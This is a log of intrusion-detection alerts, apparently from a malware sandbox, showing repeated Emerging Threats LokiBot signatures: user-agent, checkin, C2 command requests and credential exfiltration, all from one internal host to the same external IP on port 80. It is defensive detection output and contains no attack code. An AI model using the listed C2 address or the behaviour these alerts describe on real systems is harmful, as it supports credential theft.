Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:48.980951
SID:	2021641
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:24.904349
SID:	2024313
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:24.705958
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:27.665907
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:47.482327
SID:	2024318
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:18.687770
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:50.432496
SID:	2025381
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:16.174844
SID:	2021641
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:37.043735
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:27.753457
SID:	2025381
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:34.173942
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:24.705958
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:58.597395
SID:	2021641
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:41.435996
SID:	2025381
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:47.482327
SID:	2024313
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:38.519329
SID:	2024318
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:14.041821
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:34.173942
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:07.513137
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:27.665907
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:32.693379
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:14.041821
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:29.146660
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:27.665907
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:32.693379
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:42.908989
SID:	2021641
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:23.188583
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:34.173942
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:14.708232
SID:	2025381
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:12.565966
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:12.565966
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:07.242464
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:55.707371
SID:	2025381
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:26.329932
SID:	2021641
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:47.670237
SID:	2024318
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:21.940707
SID:	2025381
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:34.068335
SID:	2021641
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:47.670237
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:49.953966
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:38.508836
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:00.052049
SID:	2025381
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:04.288590
SID:	2021641
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:52.043341
SID:	2024318
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:20.116742
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:17.251353
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:11.850756
SID:	2021641
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:52.043341
SID:	2024313
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:20.496255
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:41.660723
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:20.116742
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:20.496255
SID:	2024318
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:02.935480
SID:	2024312
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:58.597395
SID:	2025381
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:23.393350
SID:	2024313
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:07.513137
SID:	2025381
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:02.935480
SID:	2024317
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:50.432496
SID:	2021641
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:57.146160
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:23.393350
SID:	2024318
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:35.607137
SID:	2024318
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:39.893817
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:35.596260
SID:	2024313
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:35.596260
SID:	2024318
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:30.890483
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:54.249806
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:29.172203
SID:	2024313
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:21.613500
SID:	2025381
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:40.002816
SID:	2024313
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:35.607137
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:44.358398
SID:	2024313
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:39.893817
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:01.472637
SID:	2021641
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:29.172203
SID:	2024318
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:15.814851
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:30.890483
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:48.980951
SID:	2024313
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:26.179565
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:52.847994
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:16.174844
SID:	2024318
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:08.959356
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:40.002816
SID:	2024318
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:43.312556
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:48.980951
SID:	2024318
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:43.312556
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:52.847994
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:10.461205
SID:	2025381
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:45.956580
SID:	2021641
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:51.405219
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:38.519329
SID:	2021641
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:16.174844
SID:	2024313
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:02.891159
SID:	2025381
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:47.482327
SID:	2021641
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:23.188583
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:37.043735
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:18.687770
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:27.665907
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:51.405219
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:24.705958
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:32.693379
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:51.405219
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:23.188583
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:37.043735
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:17.251353
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:46.212974
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:44.358398
SID:	2025381
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:26.329932
SID:	2024318
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:38.508836
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:13.266385
SID:	2024318
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:12.565966
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:05.836233
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:48.980951
SID:	2025381
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:26.329932
SID:	2024313
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:13.266385
SID:	2024313
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:10.160803
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:55.707371
SID:	2021641
Source Port:	49777
Destination Port:	80
